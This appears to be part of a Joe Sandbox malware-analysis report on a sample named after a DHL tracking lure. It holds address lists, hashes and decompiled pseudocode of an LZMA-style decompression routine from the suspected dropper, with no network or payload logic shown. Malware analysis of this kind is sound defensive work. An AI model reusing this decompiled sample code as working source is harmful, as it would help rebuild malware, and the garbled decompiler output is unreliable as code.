                    0x00000000
                    0x00000000
                    0x00406430
                    0x00406434
                    0x0040643b
                    0x0040643e
                    0x00406441
                    0x00406436
                    0x00406436
                    0x00406436
                    0x00406444
                    0x00406447
                    0x0040644a
                    0x0040644a
                    0x0040644d
                    0x00406450
                    0x00000000
                    0x00000000
                    0x004064f0
                    0x004064f0
                    0x004064f4
                    0x00406892
                    0x00000000
                    0x00406892
                    0x004064fa
                    0x004064fd
                    0x00406500
                    0x00406504
                    0x00406507
                    0x0040650d
                    0x0040650f
                    0x0040650f
                    0x0040650f
                    0x00406512
                    0x00406515
                    0x00000000
                    0x00000000
                    0x004060e5
                    0x004060e5
                    0x004060e9
                    0x00406856
                    0x00000000
                    0x00406856
                    0x004060ef
                    0x004060f2
                    0x004060f5
                    0x004060f9
                    0x004060fc
                    0x00406102
                    0x00406104
                    0x00406104
                    0x00406104
                    0x00406107
                    0x0040610a
                    0x0040610a
                    0x0040610d
                    0x00406110
                    0x00000000
                    0x00000000
                    0x00406116
                    0x0040611c
                    0x00000000
                    0x00000000
                    0x00406122
                    0x00406122
                    0x00406126
                    0x00406129
                    0x0040612c
                    0x0040612f
                    0x00406132
                    0x00406133
                    0x00406136
                    0x00406138
                    0x0040613e
                    0x00406141
                    0x00406144
                    0x00406147
                    0x0040614a
                    0x0040614d
                    0x00406150
                    0x0040616c
                    0x0040616f
                    0x00406172
                    0x00406175
                    0x0040617c
                    0x00406180
                    0x00406182
                    0x00406186
                    0x00406152
                    0x00406152
                    0x00406156
                    0x0040615e
                    0x00406163
                    0x00406165
                    0x00406167
                    0x00406167
                    0x00406189
                    0x00406190
                    0x00406193
                    0x00000000
                    0x00406199
                    0x00000000
                    0x00406199
                    0x00000000
                    0x0040619e
                    0x0040619e
                    0x004061a2
                    0x00406862
                    0x00000000
                    0x00406862
                    0x004061a8
                    0x004061ab
                    0x004061ae
                    0x004061b2
                    0x004061b5
                    0x004061bb
                    0x004061bd
                    0x004061bd
                    0x004061bd
                    0x004061c0
                    0x004061c3
                    0x004061c3
                    0x004061c3
                    0x004061c9
                    0x00000000
                    0x00000000
                    0x004061cb
                    0x004061ce
                    0x004061d1
                    0x004061d4
                    0x004061d7
                    0x004061da
                    0x004061dd
                    0x004061e0
                    0x004061e3
                    0x004061e6
                    0x004061e9
                    0x00406201
                    0x00406204
                    0x00406207
                    0x0040620a
                    0x0040620a
                    0x0040620d
                    0x00406211
                    0x00406213
                    0x004061eb
                    0x004061eb
                    0x004061f3
                    0x004061f8
                    0x004061fa
                    0x004061fc
                    0x004061fc
                    0x00406216
                    0x0040621d
                    0x00406220
                    0x00000000
                    0x00406222
                    0x00000000
                    0x00406222
                    0x00406220
                    0x00406227
                    0x00406227
                    0x00406227
                    0x00406227
                    0x00000000
                    0x00000000
                    0x00406262
                    0x00406262
                    0x00406266
                    0x0040686e
                    0x00000000
                    0x0040686e
                    0x0040626c
                    0x0040626f
                    0x00406272
                    0x00406276
                    0x00406279
                    0x0040627f
                    0x00406281
                    0x00406281
                    0x00406281
                    0x00406284
                    0x00406287
                    0x00406287
                    0x0040628d
                    0x0040622b
                    0x0040622b
                    0x0040622e
                    0x00000000
                    0x0040622e
                    0x0040628f
                    0x0040628f
                    0x00406292
                    0x00406295
                    0x00406298
                    0x0040629b
                    0x0040629e
                    0x004062a1
                    0x004062a4
                    0x004062a7
                    0x004062aa
                    0x004062ad
                    0x004062c5
                    0x004062c8
                    0x004062cb
                    0x004062ce
                    0x004062ce
                    0x004062d1
                    0x004062d5
                    0x004062d7
                    0x004062af
                    0x004062af
                    0x004062b7
                    0x004062bc
                    0x004062be
                    0x004062c0
                    0x004062c0
                    0x004062da
                    0x004062e1
                    0x004062e4
                    0x00000000
                    0x004062e6
                    0x00000000
                    0x004062e6
                    0x00000000
                    0x00406573
                    0x00406573
                    0x00406577
                    0x0040689e
                    0x00000000
                    0x0040689e
                    0x0040657d
                    0x00406580
                    0x00406583
                    0x00406587
                    0x0040658a
                    0x00406590
                    0x00406592
                    0x00406592
                    0x00406592
                    0x00406595
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406682
                    0x00406686
                    0x004066a8
                    0x004066ab
                    0x004066b5
                    0x00000000
                    0x004066b5
                    0x00406688
                    0x0040668b
                    0x0040668f
                    0x00406692
                    0x00406692
                    0x00406695
                    0x00000000
                    0x00000000
                    0x0040673f
                    0x00406743
                    0x00406761
                    0x00406761
                    0x00406761
                    0x00406768
                    0x0040676f
                    0x00406776
                    0x00406776
                    0x00000000
                    0x00406776
                    0x00406745
                    0x00406748
                    0x0040674b
                    0x0040674e
                    0x00406755
                    0x00406699
                    0x00406699
                    0x0040669c
                    0x00000000
                    0x00000000
                    0x00406830
                    0x00406833
                    0x00000000
                    0x00000000
                    0x0040646a
                    0x0040646c
                    0x00406473
                    0x00406474
                    0x00406476
                    0x00406479
                    0x00000000
                    0x00000000
                    0x00406481
                    0x00406484
                    0x00406487
                    0x00406489
                    0x0040648b
                    0x0040648b
                    0x0040648c
                    0x0040648f
                    0x00406496
                    0x00406499
                    0x004064a7
                    0x00000000
                    0x00000000
                    0x0040677d
                    0x0040677d
                    0x00406780
                    0x00406787
                    0x00000000
                    0x00000000
                    0x0040678c
                    0x0040678c
                    0x00406790
                    0x004068c8
                    0x00000000
                    0x004068c8
                    0x00406796
                    0x00406799
                    0x0040679c
                    0x004067a0
                    0x004067a3
                    0x004067a9
                    0x004067ab
                    0x004067ab
                    0x004067ab
                    0x004067ae
                    0x004067b1
                    0x004067b1
                    0x004067b1
                    0x004067b1
                    0x004067b4
                    0x004067b4
                    0x004067b8
                    0x00406818
                    0x0040681b
                    0x00406820
                    0x00406821
                    0x00406823
                    0x00406825
                    0x00406828
                    0x00000000
                    0x00406828
                    0x004067ba
                    0x004067c0
                    0x004067c3
                    0x004067c6
                    0x004067c9
                    0x004067cc
                    0x004067cf
                    0x004067d2
                    0x004067d5
                    0x004067d8
                    0x004067db
                    0x004067f4
                    0x004067f7
                    0x004067fa
                    0x004067fd
                    0x00406801
                    0x00406803
                    0x00406803
                    0x00406804
                    0x00406807
                    0x004067dd
                    0x004067dd
                    0x004067e5
                    0x004067ea
                    0x004067ec
                    0x004067ef
                    0x004067ef
                    0x0040680a
                    0x00406811
                    0x00000000
                    0x00406813
                    0x00000000
                    0x00406813
                    0x00000000
                    0x004064af
                    0x004064b2
                    0x004064e8
                    0x00406618
                    0x00406618
                    0x00406618
                    0x00406618
                    0x0040661b
                    0x0040661b
                    0x0040661e
                    0x00406620
                    0x004068aa
                    0x00000000
                    0x004068aa
                    0x00406626
                    0x00406629
                    0x00000000
                    0x00000000
                    0x0040662f
                    0x00406633
                    0x00406636
                    0x00406636
                    0x00406636
                    0x00000000
                    0x00406636
                    0x004064b4
                    0x004064b6
                    0x004064b8
                    0x004064ba
                    0x004064bd
                    0x004064be
                    0x004064c0
                    0x004064c2
                    0x004064c5
                    0x004064c8
                    0x004064de
                    0x004064e3
                    0x0040651b
                    0x0040651b
                    0x0040651f
                    0x0040654b
                    0x0040654d
                    0x00406554
                    0x00406557
                    0x0040655a
                    0x0040655a
                    0x0040655f
                    0x0040655f
                    0x00406561
                    0x00406564
                    0x0040656b
                    0x0040656e
                    0x0040659b
                    0x0040659b
                    0x0040659e
                    0x004065a1
                    0x00406615
                    0x00406615
                    0x00406615
                    0x00000000
                    0x00406615
                    0x004065a3
                    0x004065a9
                    0x004065ac
                    0x004065af
                    0x004065b2
                    0x004065b5
                    0x004065b8
                    0x004065bb
                    0x004065be
                    0x004065c1
                    0x004065c4
                    0x004065dd
                    0x004065df
                    0x004065e2
                    0x004065e3
                    0x004065e6
                    0x004065e8
                    0x004065eb
                    0x004065ed
                    0x004065ef
                    0x004065f2
                    0x004065f4
                    0x004065f7
                    0x004065fb
                    0x004065fd
                    0x004065fd
                    0x004065fe
                    0x00406601
                    0x00406604
                    0x004065c6
                    0x004065c6
                    0x004065ce
                    0x004065d3
                    0x004065d5
                    0x004065d8
                    0x004065d8
                    0x00406607
                    0x0040660e
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00000000
                    0x00406610
                    0x00000000
                    0x00406610
                    0x0040660e
                    0x00406521
                    0x00406524
                    0x00406526
                    0x00406529
                    0x0040652c
                    0x0040652f
                    0x00406531
                    0x00406534
                    0x00406537
                    0x00406537
                    0x0040653a
                    0x0040653a
                    0x0040653d
                    0x00406544
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00000000
                    0x00406546
                    0x00000000
                    0x00406546
                    0x00406544
                    0x004064ca
                    0x004064cd
                    0x004064cf
                    0x004064d2
                    0x00000000
                    0x00000000
                    0x00406231
                    0x00406231
                    0x00406235
                    0x0040687a
                    0x00000000
                    0x0040687a
                    0x0040623b
                    0x0040623e
                    0x00406241
                    0x00406244
                    0x00406247
                    0x0040624a
                    0x0040624d
                    0x0040624f
                    0x00406252
                    0x00406255
                    0x00406258
                    0x0040625a
                    0x0040625a
                    0x0040625a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406639
                    0x00406639
                    0x00406639
                    0x0040663d
                    0x00000000
                    0x00000000
                    0x00406643
                    0x00406646
                    0x00406649
                    0x0040664c
                    0x0040664e
                    0x0040664e
                    0x0040664e
                    0x00406651
                    0x00406654
                    0x00406657
                    0x0040665a
                    0x0040665d
                    0x00406660
                    0x00406661
                    0x00406663
                    0x00406663
                    0x00406663
                    0x00406666
                    0x00406669
                    0x0040666c
                    0x0040666f
                    0x00406672
                    0x00406676
                    0x00406678
                    0x0040667b
                    0x00000000
                    0x0040667d
                    0x00000000
                    0x0040667d
                    0x0040667b
                    0x004068b0
                    0x00000000
                    0x00000000
                    0x00405edf

                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                    • Instruction ID: 22847fb14cdf7a24f95a3c84300c4786f150dfac54d3f328c430af40b2e48c23
                    • Opcode Fuzzy Hash: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                    • Instruction Fuzzy Hash: EB816871D04229CFDF24CFA8C844BAEBBB1FB44305F25816AD406BB281C7789A86DF54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405E9D Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                    Download Yara Rule
                    C-Code - Quality: 98%
                    			E00405E9D(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004068EF))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
